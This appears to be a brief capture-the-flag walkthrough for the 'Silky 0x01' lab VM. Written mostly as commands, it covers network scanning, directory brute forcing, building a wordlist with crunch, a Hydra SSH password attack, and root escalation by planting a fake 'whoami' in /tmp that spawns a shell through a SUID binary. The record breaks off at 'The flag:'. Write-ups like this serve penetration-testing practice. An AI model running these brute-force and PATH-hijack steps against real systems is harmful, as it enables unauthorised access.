CTF Silky 0x01

  1. netdiscover
  2. rustscan
  3. gobuster
  4. Wordlist
  5. Hydra
  6. ssh
  7. lse
  8. /usr/bin/sky

netdiscover


192.168.0.12

rustscan

rustscan -a 192.168.0.12

gobuster

gobuster dir -u http://192.168.0.12 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt

gobuster dir -u http://192.168.0.12 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt

http://192.168.0.12/notes.txt

Ich muss unbedingt das Passwort aus der Seite entfernen, immerhin fehlen die letzten 2 Zeichen. Aber trotzdem.

I really need to remove the password from the page, after all the last 2 characters are missing. But still.

view-source:http://192.168.0.12/script.js
// s1lKy

Wordlist

So the password should be at 7 charachters.
Let’s create a wordlist with crunch.

crunch 7 7 -t s1lKy^% > pass

Hydra

hydra -l silky -P pass 192.168.0.12 -t 10 -V ssh

ssh

ssh ssilky@192.168.0.12
s1lKy#5

lse

/usr/bin/sky

/usr/bin/sky

Output:

Seide ist ein tierischer Faserstoff. Sie wird aus den Kokons der Seidenraupe, der Larve des Seidenspinners, gewonnen. 
gezeichnet:
root
strings /usr/bin/sky

Output:

He use whoami as root, let’s create our own whoami file.

cd /tmp
echo "/bin/sh" > whoami
chmod +x whoami 
export PATH="/tmp:$PATH"
/usr/bin/sky


The flag: